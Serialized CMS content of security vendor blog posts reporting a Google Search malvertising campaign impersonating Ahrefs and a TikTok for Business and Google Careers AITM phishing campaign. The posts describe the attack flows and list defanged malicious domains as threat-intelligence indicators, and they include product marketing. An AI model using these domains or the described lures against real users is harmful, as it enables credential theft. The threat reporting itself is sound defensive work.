",[],{},{"nodeType":1258,"data":8799,"content":8800},{},[8801,8805,8813,8817,8826,8829,8838,8841,8850],{"nodeType":1257,"value":8802,"marks":8803,"data":8804},"Malvertising attacks delivered over channels like Google Search are a great way to catch victims unawares while also evading typically email-based anti-phishing controls. Malvertising is an increasingly popular attack vector for the delivery of AITM phishing, malware downloads, and ",[],{},{"nodeType":1364,"data":8806,"content":8807},{"uri":2543},[8808],{"nodeType":1257,"value":8809,"marks":8810,"data":8812},"ClickFix",[8811],{"type":1372},{},{"nodeType":1257,"value":8814,"marks":8815,"data":8816}," (4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search). This isn’t just targeting ad manager accounts — last year, we reported on campaigns impersonating ",[],{},{"nodeType":1364,"data":8818,"content":8820},{"uri":8819},"https://pushsecurity.com/blog/analysing-a-sophisticated-google-malvertising-attack/",[8821],{"nodeType":1257,"value":8822,"marks":8823,"data":8825},"TradingView",[8824],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":8827,"data":8828},[],{},{"nodeType":1364,"data":8830,"content":8832},{"uri":8831},"https://pushsecurity.com/blog/phishing-with-active-directory-federation-services/",[8833],{"nodeType":1257,"value":8834,"marks":8835,"data":8837},"Microsoft Office 365",[8836],{"type":1372},{},{"nodeType":1257,"value":4072,"marks":8839,"data":8840},[],{},{"nodeType":1364,"data":8842,"content":8844},{"uri":8843},"https://pushsecurity.com/blog/investigating-a-recent-malvertising-campaign-targeting-onfido-customers/",[8845],{"nodeType":1257,"value":8846,"marks":8847,"data":8849},"Onfido",[8848],{"type":1372},{},{"nodeType":1257,"value":8851,"marks":8852,"data":8853},", to name a few. ",[],{},{"nodeType":1258,"data":8855,"content":8856},{},[8857],{"nodeType":1257,"value":8858,"marks":8859,"data":8860},"There’s a tendency to see malvertising as a more random attack, but Google Ads can be tuned to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Even more precise ad targeting can be achieved on social media platforms. ",[],{},{"nodeType":1258,"data":8862,"content":8863},{},[8864],{"nodeType":1257,"value":8865,"marks":8866,"data":8867},"Because these attacks completely circumvent the traditional phishing detection surface (email) and often happen entirely over the internet (meaning no endpoint security controls can come into play) the only way to reliably detect and stop these attacks is to intercept them where they happen — in the user’s web browser. ",[],{},{"nodeType":1307,"data":8869,"content":8870},{},[],{"nodeType":1311,"data":8872,"content":8873},{},[8874],{"nodeType":1257,"value":3044,"marks":8875,"data":8877},[8876],{"type":1318},{},{"nodeType":1258,"data":8879,"content":8880},{},[8881],{"nodeType":1257,"value":8882,"marks":8883,"data":8884},"Regardless of the delivery channel, all roads lead to a web page accessed in the victim’s browser, where Push is waiting to detect and block the attack. Even if the page has never been previously flagged as suspicious or malicious, Push analyses the page in real time and blocks it — protecting against the latest zero-day threats.  ",[],{},{"nodeType":1258,"data":8886,"content":8887},{},[8888],{"nodeType":1257,"value":8889,"marks":8890,"data":8891},"By seeing what your users see, and getting an unfiltered, real-time view of the page as it loads, Push is able to pinpoint malicious content, code, and behaviors and shut the attack down before it happens. Whether it's entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA, Push detects the action and shuts it down.",[],{},{"nodeType":1258,"data":8893,"content":8894},{},[8895],{"nodeType":1257,"value":8896,"marks":8897,"data":8898},"Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":1258,"data":8900,"content":8901},{},[8902,8905,8912,8915,8922],{"nodeType":1257,"value":2223,"marks":8903,"data":8904},[],{},{"nodeType":1364,"data":8906,"content":8907},{"uri":2228},[8908],{"nodeType":1257,"value":2231,"marks":8909,"data":8911},[8910],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":8913,"data":8914},[],{},{"nodeType":1364,"data":8916,"content":8917},{"uri":2241},[8918],{"nodeType":1257,"value":2244,"marks":8919,"data":8921},[8920],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":8923,"data":8924},[],{},{"nodeType":1307,"data":8926,"content":8927},{},[],{"nodeType":1311,"data":8929,"content":8930},{},[8931],{"nodeType":1257,"value":2933,"marks":8932,"data":8934},[8933],{"type":1318},{},{"nodeType":1258,"data":8936,"content":8937},{},[8938,8941,8948],{"nodeType":1257,"value":2941,"marks":8939,"data":8940},[],{},{"nodeType":1364,"data":8942,"content":8943},{"uri":2946},[8944],{"nodeType":1257,"value":2949,"marks":8945,"data":8947},[8946],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":8949,"data":8950},[],{},{"nodeType":1258,"data":8952,"content":8953},{},[8954],{"nodeType":1257,"value":8955,"marks":8956,"data":8957},"That said, the domains observed in this chain were:",[],{},{"nodeType":1884,"data":8959,"content":8960},{},[8961,8971,8981,8991],{"nodeType":1888,"data":8962,"content":8963},{},[8964],{"nodeType":1258,"data":8965,"content":8966},{},[8967],{"nodeType":1257,"value":8968,"marks":8969,"data":8970},"comandd-ok[.]com",[],{},{"nodeType":1888,"data":8972,"content":8973},{},[8974],{"nodeType":1258,"data":8975,"content":8976},{},[8977],{"nodeType":1257,"value":8978,"marks":8979,"data":8980},"ahrefs-ac.squarespace[.]com",[],{},{"nodeType":1888,"data":8982,"content":8983},{},[8984],{"nodeType":1258,"data":8985,"content":8986},{},[8987],{"nodeType":1257,"value":8988,"marks":8989,"data":8990},"ahrefs-seo-app.squarespace[.]com",[],{},{"nodeType":1888,"data":8992,"content":8993},{},[8994],{"nodeType":1258,"data":8995,"content":8996},{},[8997],{"nodeType":1257,"value":8998,"marks":8999,"data":9000},"slgn-ahrefs-app-com.squarespace[.]com",[],{},{"nodeType":1258,"data":9002,"content":9003},{},[9004],{"nodeType":1257,"value":9005,"marks":9006,"data":9007},"[Update 24th February] We also observed the following new domains:",[],{},{"nodeType":1884,"data":9009,"content":9010},{},[9011,9021,9031,9041],{"nodeType":1888,"data":9012,"content":9013},{},[9014],{"nodeType":1258,"data":9015,"content":9016},{},[9017],{"nodeType":1257,"value":9018,"marks":9019,"data":9020},"www-ahrefs-seo-ads[.]surge.sh",[],{},{"nodeType":1888,"data":9022,"content":9023},{},[9024],{"nodeType":1258,"data":9025,"content":9026},{},[9027],{"nodeType":1257,"value":9028,"marks":9029,"data":9030},"web-semrush-seo-wold[.]surge[.]sh",[],{},{"nodeType":1888,"data":9032,"content":9033},{},[9034],{"nodeType":1258,"data":9035,"content":9036},{},[9037],{"nodeType":1257,"value":9038,"marks":9039,"data":9040},"contabelforeehc[.]com",[],{},{"nodeType":1888,"data":9042,"content":9043},{},[9044],{"nodeType":1258,"data":9045,"content":9046},{},[9047],{"nodeType":1257,"value":9048,"marks":9049,"data":9050},"contabelfore[.]com",[],{},{"nodeType":1258,"data":9052,"content":9053},{},[9054],{"nodeType":1257,"value":9055,"marks":9056,"data":9057},"In addition, the following domains were previously associated with the attacks we detected in December:",[],{},{"nodeType":1884,"data":9059,"content":9060},{},[9061,9071,9081,9091,9101,9111,9121],{"nodeType":1888,"data":9062,"content":9063},{},[9064],{"nodeType":1258,"data":9065,"content":9066},{},[9067],{"nodeType":1257,"value":9068,"marks":9069,"data":9070},"ads-adsword1.odoo[.]com",[],{},{"nodeType":1888,"data":9072,"content":9073},{},[9074],{"nodeType":1258,"data":9075,"content":9076},{},[9077],{"nodeType":1257,"value":9078,"marks":9079,"data":9080},"sing-operador2[.]click/accounts/v3/login",[],{},{"nodeType":1888,"data":9082,"content":9083},{},[9084],{"nodeType":1258,"data":9085,"content":9086},{},[9087],{"nodeType":1257,"value":9088,"marks":9089,"data":9090},"adsgooglie.odoo[.]com/",[],{},{"nodeType":1888,"data":9092,"content":9093},{},[9094],{"nodeType":1258,"data":9095,"content":9096},{},[9097],{"nodeType":1257,"value":9098,"marks":9099,"data":9100},"word4only[.]online/",[],{},{"nodeType":1888,"data":9102,"content":9103},{},[9104],{"nodeType":1258,"data":9105,"content":9106},{},[9107],{"nodeType":1257,"value":9108,"marks":9109,"data":9110},"adsloginacess.kartra[.]com/page/oeN7",[],{},{"nodeType":1888,"data":9112,"content":9113},{},[9114],{"nodeType":1258,"data":9115,"content":9116},{},[9117],{"nodeType":1257,"value":9118,"marks":9119,"data":9120},"ads-o.odoo[.]com",[],{},{"nodeType":1888,"data":9122,"content":9123},{},[9124],{"nodeType":1258,"data":9125,"content":9126},{},[9127],{"nodeType":1257,"value":9128,"marks":9129,"data":9130},"operador8-ads[.]lat/accounts/v3/login/",[],{},{"nodeType":1258,"data":9132,"content":9133},{},[9134],{"nodeType":1257,"value":9135,"marks":9136,"data":9138},"Push customers do not need to take any further action.",[9137],{"type":1318},{},"Google Search malvertising campaign continues, now impersonating Ahrefs","New samples linked to a Push-tracked malvertising campaign detected, targeting Google accounts via an Ahrefs lure. ","2026-01-12T00:00:00.000Z","google-search-malvertising-campaign-continues-now-impersonating-ahrefs",{"items":9144},[9145,9147],{"sys":9146,"name":1274},{"id":1273},{"sys":9148,"name":1270},{"id":1269},{"items":9150},[9151],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":9152},{"url":2269},{"items":9154},[9155],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":9156},{"url":2269},{"json":9158,"links":9734},{"nodeType":1259,"data":9159,"content":9160},{},[9161,9168,9188,9194,9197,9205,9212,9219,9226,9249,9256,9275,9282,9288,9296,9303,9309,9315,9321,9327,9333,9339,9345,9348,9356,9363,9370,9390,9436,9443,9485,9491,9494,9501,9517,9524,9636,9643,9656,9663,9666,9674,9680,9686,9722,9728],{"nodeType":1258,"data":9162,"content":9163},{},[9164],{"nodeType":1257,"value":9165,"marks":9166,"data":9167},"We recently detected and blocked a new style of phishing page targeting TikTok for Business accounts — used by company marketing teams to manage ad campaigns. ",[],{},{"nodeType":1258,"data":9169,"content":9170},{},[9171,9175,9184],{"nodeType":1257,"value":9172,"marks":9173,"data":9174},"On closer analysis, we identified a cluster of linked pages featuring both TikTok themes, and Google themed “Schedule a Call” imitation pages, ",[],{},{"nodeType":1364,"data":9176,"content":9178},{"uri":9177},"https://sublime.security/blog/google-careers-impersonation-credential-phishing-scam-with-endless-variation/",[9179],{"nodeType":1257,"value":9180,"marks":9181,"data":9183},"similar to a campaign reported late last year",[9182],{"type":1372},{},{"nodeType":1257,"value":9185,"marks":9186,"data":9187},", suggesting a continuity of this previous campaign.",[],{},{"nodeType":1335,"data":9189,"content":9193},{"target":9190},{"sys":9191},{"id":9192,"type":1340,"linkType":1341},"6mR622LOKuhGRfBXkIsUrx",[],{"nodeType":1307,"data":9195,"content":9196},{},[],{"nodeType":1311,"data":9198,"content":9199},{},[9200],{"nodeType":1257,"value":9201,"marks":9202,"data":9204},"Campaign breakdown",[9203],{"type":1318},{},{"nodeType":1258,"data":9206,"content":9207},{},[9208],{"nodeType":1257,"value":9209,"marks":9210,"data":9211},"Push researchers have identified a cluster of newly registered phishing pages all registered on the 24th March within a 9-second window. All of the pages are hosted behind Cloudflare with the same registrar (Nicenic International Group, commonly abused for bulk phishing domain registration). ",[],{},{"nodeType":1258,"data":9213,"content":9214},{},[9215],{"nodeType":1257,"value":9216,"marks":9217,"data":9218},"The pages feature a common naming convention, being various derivations of welcome.careers*[.]com. A full list of identified domains is provided later, but we expect this to grow significantly as the campaign ramps up. ",[],{},{"nodeType":1258,"data":9220,"content":9221},{},[9222],{"nodeType":1257,"value":9223,"marks":9224,"data":9225},"Victims are tricked into clicking a malicious link that takes them to one of two page styles. ",[],{},{"nodeType":1884,"data":9227,"content":9228},{},[9229,9239],{"nodeType":1888,"data":9230,"content":9231},{},[9232],{"nodeType":1258,"data":9233,"content":9234},{},[9235],{"nodeType":1257,"value":9236,"marks":9237,"data":9238},"A TikTok for Business cloned page ",[],{},{"nodeType":1888,"data":9240,"content":9241},{},[9242],{"nodeType":1258,"data":9243,"content":9244},{},[9245],{"nodeType":1257,"value":9246,"marks":9247,"data":9248},"A Google careers “Schedule a call” cloned page",[],{},{"nodeType":1258,"data":9250,"content":9251},{},[9252],{"nodeType":1257,"value":9253,"marks":9254,"data":9255},"In both cases, the victim is required to complete a basic information form before being served with a malicious login page that is in fact fronting a reverse proxy AITM phishing kit. ",[],{},{"nodeType":1258,"data":9257,"content":9258},{},[9259,9263,9271],{"nodeType":1257,"value":9260,"marks":9261,"data":9262},"While Push has limited visibility of the initial delivery mechanism in this case, we can assume that a similar method of dynamically generated email is being used to the ",[],{},{"nodeType":1364,"data":9264,"content":9265},{"uri":9177},[9266],{"nodeType":1257,"value":9267,"marks":9268,"data":9270},"previously identified campaign",[9269],{"type":1372},{},{"nodeType":1257,"value":9272,"marks":9273,"data":9274}," reported by Sublime in October, featuring a similar Google Careers cloned page. ",[],{},{"nodeType":1258,"data":9276,"content":9277},{},[9278],{"nodeType":1257,"value":9279,"marks":9280,"data":9281},"You can see an example of the page load below. ",[],{},{"nodeType":1335,"data":9283,"content":9287},{"target":9284},{"sys":9285},{"id":9286,"type":1340,"linkType":1341},"3wjGpMs3qJsZaar2LIlQbE",[],{"nodeType":1468,"data":9289,"content":9290},{},[9291],{"nodeType":1257,"value":9292,"marks":9293,"data":9295},"Attack flow",[9294],{"type":1318},{},{"nodeType":1258,"data":9297,"content":9298},{},[9299],{"nodeType":1257,"value":9300,"marks":9301,"data":9302},"When the link is first clicked, the page is silently redirected from a legitimate Google Storage site before loading the page. A Cloudflare Turnstile check is used to prevent security bots from analyzing the page, before loading either a TikTok or Google themed page. Progressing through the forms ultimately serves up an AITM phishing page.",[],{},{"nodeType":1335,"data":9304,"content":9308},{"target":9305},{"sys":9306},{"id":9307,"type":1340,"linkType":1341},"5zoUeGW0zlC7u9vtHolskM",[],{"nodeType":1335,"data":9310,"content":9314},{"target":9311},{"sys":9312},{"id":9313,"type":1340,"linkType":1341},"7eyc9v7xVZzXK8jY53I9li",[],{"nodeType":1335,"data":9316,"content":9320},{"target":9317},{"sys":9318},{"id":9319,"type":1340,"linkType":1341},"37kj78jit44Mp6LCi7tEsC",[],{"nodeType":1335,"data":9322,"content":9326},{"target":9323},{"sys":9324},{"id":9325,"type":1340,"linkType":1341},"4qaPOlBYeIfEoG2OZvl8lI",[],{"nodeType":1335,"data":9328,"content":9332},{"target":9329},{"sys":9330},{"id":9331,"type":1340,"linkType":1341},"7cIFMDwHF2R8vswtJzWdKn",[],{"nodeType":1335,"data":9334,"content":9338},{"target":9335},{"sys":9336},{"id":9337,"type":1340,"linkType":1341},"5YtrhvypdLkcSUoj2IEj24",[],{"nodeType":1335,"data":9340,"content":9344},{"target":9341},{"sys":9342},{"id":9343,"type":1340,"linkType":1341},"7cc4UclvVVW3YuUVB8PpJp",[],{"nodeType":1307,"data":9346,"content":9347},{},[],{"nodeType":1311,"data":9349,"content":9350},{},[9351],{"nodeType":1257,"value":9352,"marks":9353,"data":9355},"Why TikTok???",[9354],{"type":1318},{},{"nodeType":1258,"data":9357,"content":9358},{},[9359],{"nodeType":1257,"value":9360,"marks":9361,"data":9362},"Given that the majority of phishing pages intercepted by Push tend to replicate core SSO platforms like Google and Microsoft, targeting TikTok is a notable development, though not entirely uncommon. ",[],{},{"nodeType":1258,"data":9364,"content":9365},{},[9366],{"nodeType":1257,"value":9367,"marks":9368,"data":9369},"TikTok seems a weird choice at first glance. But it makes more sense when we consider that TikTok has been historically abused to distribute malicious links and social engineering instructions. ",[],{},{"nodeType":1258,"data":9371,"content":9372},{},[9373,9377,9386],{"nodeType":1257,"value":9374,"marks":9375,"data":9376},"This includes multiple infostealers like Vidar, StealC, and Aura Stealer delivered via ClickFix-style instructions with AI-generated videos posed as activation guides for Windows, Spotify, and CapCut. They instructed viewers to open PowerShell and paste commands that downloaded infostealers from bulletproof hosting infrastructure. ",[],{},{"nodeType":1364,"data":9378,"content":9380},{"uri":9379},"https://thehackernews.com/2025/05/hackers-use-tiktok-videos-to-distribute.html",[9381],{"nodeType":1257,"value":9382,"marks":9383,"data":9385},"One video alone",[9384],{"type":1372},{},{"nodeType":1257,"value":9387,"marks":9388,"data":9389}," hit ~500,000 views and 20,000+ likes.",[],{},{"nodeType":1258,"data":9391,"content":9392},{},[9393,9397,9406,9410,9419,9423,9432],{"nodeType":1257,"value":9394,"marks":9395,"data":9396},"It’s also a common hunting ground for crypto scammers, like many other social platforms have historically been abused (most commonly Twitter/X). Many of these are done with the full knowledge and consent of “influencers”, but there are also overtly malicious examples such as ",[],{},{"nodeType":1364,"data":9398,"content":9400},{"uri":9399},"https://www.bitdefender.com/en-us/blog/hotforsecurity/fake-elon-musk-crypto-giveaway-scam-campaigns-run-rampant-on-tiktok",[9401],{"nodeType":1257,"value":9402,"marks":9403,"data":9405},"deepfaked videos of Elon Musk",[9404],{"type":1372},{},{"nodeType":1257,"value":9407,"marks":9408,"data":9409}," with overlaid AI-generated audio promoting fake exchanges. ",[],{},{"nodeType":1364,"data":9411,"content":9413},{"uri":9412},"https://www.malwarebytes.com/blog/news/2025/10/tiktok-scam-sells-you-access-to-your-own-fake-money",[9414],{"nodeType":1257,"value":9415,"marks":9416,"data":9418},"TikTok DMs",[9417],{"type":1372},{},{"nodeType":1257,"value":9420,"marks":9421,"data":9422},", like ",[],{},{"nodeType":1364,"data":9424,"content":9426},{"uri":9425},"https://pushsecurity.com/blog/new-phishing-campaign-identified-targeting-linkedin-users/",[9427],{"nodeType":1257,"value":9428,"marks":9429,"data":9431},"other social media apps",[9430],{"type":1372},{},{"nodeType":1257,"value":9433,"marks":9434,"data":9435},", are also a place where attackers can target victims. ",[],{},{"nodeType":1258,"data":9437,"content":9438},{},[9439],{"nodeType":1257,"value":9440,"marks":9441,"data":9442},"Ultimately, it’s easy to see how access to verified and trustworthy business accounts on TikTok could be abused in the wrong hands. ",[],{},{"nodeType":1258,"data":9444,"content":9445},{},[9446,9450,9458,9462,9470,9474,9482],{"nodeType":1257,"value":9447,"marks":9448,"data":9449},"It’s worth pointing out too that many/most business users will opt to “log in with Google.” This means that anyone using Google to login to their TikTok account will effectively have both accounts used to distribute ads compromised in one go, opening up the typical ",[],{},{"nodeType":1364,"data":9451,"content":9452},{"uri":7710},[9453],{"nodeType":1257,"value":9454,"marks":9455,"data":9457},"Google Ad Manager exploitation playbook",[9456],{"type":1372},{},{"nodeType":1257,"value":9459,"marks":9460,"data":9461}," — as well as accessing any further apps accessible via SSO for data theft and extortion. This has become the standard MO for attackers, in campaigns such as the ",[],{},{"nodeType":1364,"data":9463,"content":9464},{"uri":1720},[9465],{"nodeType":1257,"value":9466,"marks":9467,"data":9469},"Scattered Lapsus$ Hunters AITM phishing",[9468],{"type":1372},{},{"nodeType":1257,"value":9471,"marks":9472,"data":9473}," spree earlier this year, and their ",[],{},{"nodeType":1364,"data":9475,"content":9476},{"uri":4064},[9477],{"nodeType":1257,"value":9478,"marks":9479,"data":9481},"recent spate of device code phishing attacks",[9480],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":9483,"data":9484},[],{},{"nodeType":1335,"data":9486,"content":9490},{"target":9487},{"sys":9488},{"id":9489,"type":1340,"linkType":1341},"4H3AzW7q4QBv7pJawSqQBJ",[],{"nodeType":1307,"data":9492,"content":9493},{},[],{"nodeType":1311,"data":9495,"content":9496},{},[9497],{"nodeType":1257,"value":2933,"marks":9498,"data":9500},[9499],{"type":1318},{},{"nodeType":1258,"data":9502,"content":9503},{},[9504,9507,9514],{"nodeType":1257,"value":2941,"marks":9505,"data":9506},[],{},{"nodeType":1364,"data":9508,"content":9509},{"uri":2946},[9510],{"nodeType":1257,"value":2949,"marks":9511,"data":9513},[9512],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":9515,"data":9516},[],{},{"nodeType":1258,"data":9518,"content":9519},{},[9520],{"nodeType":1257,"value":9521,"marks":9522,"data":9523},"That said, the domains observed in the initial cluster were:",[],{},{"nodeType":1884,"data":9525,"content":9526},{},[9527,9537,9547,9557,9567,9577,9587,9597,9607,9617,9627],{"nodeType":1888,"data":9528,"content":9529},{},[9530],{"nodeType":1258,"data":9531,"content":9532},{},[9533],{"nodeType":1257,"value":9534,"marks":9535,"data":9536},"welcome.careerscrews[.]com",[],{},{"nodeType":1888,"data":9538,"content":9539},{},[9540],{"nodeType":1258,"data":9541,"content":9542},{},[9543],{"nodeType":1257,"value":9544,"marks":9545,"data":9546},"welcome.careerstaffer[.]com",[],{},{"nodeType":1888,"data":9548,"content":9549},{},[9550],{"nodeType":1258,"data":9551,"content":9552},{},[9553],{"nodeType":1257,"value":9554,"marks":9555,"data":9556},"welcome.careersworkflow[.]com",[],{},{"nodeType":1888,"data":9558,"content":9559},{},[9560],{"nodeType":1258,"data":9561,"content":9562},{},[9563],{"nodeType":1257,"value":9564,"marks":9565,"data":9566},"welcome.careerstransform[.]com",[],{},{"nodeType":1888,"data":9568,"content":9569},{},[9570],{"nodeType":1258,"data":9571,"content":9572},{},[9573],{"nodeType":1257,"value":9574,"marks":9575,"data":9576},"welcome.careersupskill[.]com",[],{},{"nodeType":1888,"data":9578,"content":9579},{},[9580],{"nodeType":1258,"data":9581,"content":9582},{},[9583],{"nodeType":1257,"value":9584,"marks":9585,"data":9586},"welcome.careerssuccess[.]com",[],{},{"nodeType":1888,"data":9588,"content":9589},{},[9590],{"nodeType":1258,"data":9591,"content":9592},{},[9593],{"nodeType":1257,"value":9594,"marks":9595,"data":9596},"welcome.careersstaffgrid[.]com",[],{},{"nodeType":1888,"data":9598,"content":9599},{},[9600],{"nodeType":1258,"data":9601,"content":9602},{},[9603],{"nodeType":1257,"value":9604,"marks":9605,"data":9606},"welcome.careersprogress[.]com",[],{},{"nodeType":1888,"data":9608,"content":9609},{},[9610],{"nodeType":1258,"data":9611,"content":9612},{},[9613],{"nodeType":1257,"value":9614,"marks":9615,"data":9616},"welcome.careersgrower[.]com",[],{},{"nodeType":1888,"data":9618,"content":9619},{},[9620],{"nodeType":1258,"data":9621,"content":9622},{},[9623],{"nodeType":1257,"value":9624,"marks":9625,"data":9626},"welcome.careersengage[.]com",[],{},{"nodeType":1888,"data":9628,"content":9629},{},[9630],{"nodeType":1258,"data":9631,"content":9632},{},[9633],{"nodeType":1257,"value":9534,"marks":9634,"data":9635},[],{},{"nodeType":1258,"data":9637,"content":9638},{},[9639],{"nodeType":1257,"value":9640,"marks":9641,"data":9642},"Since the pages are all hosted in a single Google Storage bucket, any linked pages/files should be considered to be malicious.",[],{},{"nodeType":1884,"data":9644,"content":9645},{},[9646],{"nodeType":1888,"data":9647,"content":9648},{},[9649],{"nodeType":1258,"data":9650,"content":9651},{},[9652],{"nodeType":1257,"value":9653,"marks":9654,"data":9655},"storage.googleapis[.]com/fiz2a4s014vt8q4l5i0m1m7b0gl/",[],{},{"nodeType":1258,"data":9657,"content":9658},{},[9659],{"nodeType":1257,"value":9135,"marks":9660,"data":9662},[9661],{"type":1318},{},{"nodeType":1307,"data":9664,"content":9665},{},[],{"nodeType":1311,"data":9667,"content":9668},{},[9669],{"nodeType":1257,"value":9670,"marks":9671,"data":9673},"About Push Security",[9672],{"type":1318},{},{"nodeType":1258,"data":9675,"content":9676},{},[9677],{"nodeType":1257,"value":8007,"marks":9678,"data":9679},[],{},{"nodeType":1258,"data":9681,"content":9682},{},[9683],{"nodeType":1257,"value":6324,"marks":9684,"data":9685},[],{},{"nodeType":1258,"data":9687,"content":9688},{},[9689,9692,9699,9702,9709,9712,9719],{"nodeType":1257,"value":2223,"marks":9690,"data":9691},[],{},{"nodeType":1364,"data":9693,"content":9694},{"uri":2228},[9695],{"nodeType":1257,"value":2231,"marks":9696,"data":9698},[9697],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":9700,"data":9701},[],{},{"nodeType":1364,"data":9703,"content":9704},{"uri":3737},[9705],{"nodeType":1257,"value":6347,"marks":9706,"data":9708},[9707],{"type":1372},{},{"nodeType":1257,"value":3744,"marks":9710,"data":9711},[],{},{"nodeType":1364,"data":9713,"content":9714},{"uri":2241},[9715],{"nodeType":1257,"value":2244,"marks":9716,"data":9718},[9717],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":9720,"data":9721},[],{},{"nodeType":1335,"data":9723,"content":9727},{"target":9724},{"sys":9725},{"id":9726,"type":1340,"linkType":1341},"7ccfmP2yXXmtC1R5BLmKYg",[],{"nodeType":1258,"data":9729,"content":9730},{},[9731],{"nodeType":1257,"value":31,"marks":9732,"data":9733},[],{},{"entries":9735},{"hyperlink":9736,"inline":9737,"block":9738},[],[],[9739,9778,9783,9790,9796,9802,9808,9814,9820,9825,9832],{"sys":9740,"__typename":6371,"content":9741,"name":9777,"title":118},{"id":9192},{"json":9742},{"data":9743,"content":9744,"nodeType":1259},{},[9745],{"data":9746,"content":9747,"nodeType":1258},{},[9748,9752,9761,9765,9773],{"data":9749,"marks":9750,"value":9751,"nodeType":1257},{},[],"We’ve ",{"data":9753,"content":9755,"nodeType":1364},{"uri":9754},"https://pushsecurity.com/blog/google-search-malvertising-campaign-continues-now-impersonating-ahrefs/",[9756],{"data":9757,"marks":9758,"value":9760,"nodeType":1257},{},[9759],{"type":1372},"reported extensively",{"data":9762,"marks":9763,"value":9764,"nodeType":1257},{},[]," about malvertising scams in the past — particularly targeting Google Ad Manager accounts. Attackers take over Ad Manager accounts and use them to deploy even more malicious ads, harvesting account credentials via AITM phishing pages and ClickFix-style malware delivery (dropping infostealers and remote access tools). They also run ",{"data":9766,"content":9767,"nodeType":1364},{"uri":7710},[9768],{"data":9769,"marks":9770,"value":9772,"nodeType":1257},{},[9771],{"type":1372},"ad fraud campaigns",{"data":9774,"marks":9775,"value":9776,"nodeType":1257},{},[]," siphoning company ad budgets into their own pockets. ","Tiktok phishing insight box 1",{"sys":9779,"__typename":6482,"title":9780,"arcadeDemoUrl":9781,"playText":9782},{"id":9286},"Tiktok phishing demo","https://demo.arcade.software/i0NCDltufFhv8xouaTxr?embed","30 secs",{"sys":9784,"__typename":6404,"title":9785,"caption":9785,"layoutMode":118,"file":9786},{"id":9307},"Push example detection timeline showing the initial redirect. In this example Push was configured to Monitor only mode, rather than Block mode.",{"url":9787,"width":9788,"height":9789},"https://images.ctfassets.net/y1cdw1ablpvd/5WAwawK6I0Ez56HE9icvO4/6ad8fedf0c6b72b29b1664ea854593be/image8.png",1802,954,{"sys":9791,"__typename":6404,"title":9792,"caption":9792,"layoutMode":118,"file":9793},{"id":9313},"Initial Cloudflare Turnstile bot check to block security bots from analyzing the page.",{"url":9794,"width":6471,"height":9795},"https://images.ctfassets.net/y1cdw1ablpvd/28rZywTFT0ro4dhWPCfwAJ/6a8342f9bb785db5ed8677939921645d/image6.png",1131,{"sys":9797,"__typename":6404,"title":9798,"caption":9798,"layoutMode":118,"file":9799},{"id":9319},"TikTok for Business themed page.",{"url":9800,"width":6471,"height":9801},"https://images.ctfassets.net/y1cdw1ablpvd/7uoSoE5xwXEBA3tCIOReTX/3e8b06e18097f8625f3edaa92ba770d1/image2.png",1142,{"sys":9803,"__typename":6404,"title":9804,"caption":9804,"layoutMode":118,"file":9805},{"id":9325},"Google Careers themed landing page.",{"url":9806,"width":6471,"height":9807},"https://images.ctfassets.net/y1cdw1ablpvd/5NQmzcYtnsqONZFMljk1Z8/354a8721f4c2195c1aa88b3258a073f1/image1.png",1213,{"sys":9809,"__typename":6404,"title":9810,"caption":9810,"layoutMode":118,"file":9811},{"id":9331},"TikTok for Business themed login page.  The fake page has replaced the “Log in with TikTok” button with “Log in with Google”. ",{"url":9812,"width":6471,"height":9813},"https://images.ctfassets.net/y1cdw1ablpvd/5rDbxr6ZkcbGv2f6opf6TE/c6997fa3fe50426dae17c6578e2c04f1/image4.png",1191,{"sys":9815,"__typename":6404,"title":9816,"caption":9816,"layoutMode":118,"file":9817},{"id":9337},"The TikTok login page has input validation that requires a business email address.",{"url":9818,"width":6471,"height":9819},"https://images.ctfassets.net/y1cdw1ablpvd/1ba6sQzfR3hjeQHyx8zjae/f588da1242c68ea03ee149d489ee272e/image7.png",1127,{"sys":9821,"__typename":6404,"title":9822,"caption":9822,"layoutMode":118,"file":9823},{"id":9343},"Cloned Google login page hosting an AITM phishing kit.",{"url":9824,"width":6471,"height":9801},"https://images.ctfassets.net/y1cdw1ablpvd/6aGrOKJBuwAPalVYgx4P9u/41a456ba585767c6af8637bab392cabf/image5.png",{"sys":9826,"__typename":9827,"type":9828,"ctaText":9829,"buttonLabel":9830,"buttonColour":9831,"buttonUrl":66},{"id":9489},"CtaWidget","Custom","Learn about the browser attack techniques security teams must contend with in 2026","Get the Report","sunny orange",{"sys":9833,"__typename":9827,"type":9828,"ctaText":9834,"buttonLabel":9835,"buttonColour":9831,"buttonUrl":47},{"id":9726},"Get ahead of the latest browser attacks with our new webinar series, featuring guest experts John Hammond, Troy Hunt, Matt Johansen, and more!","Register 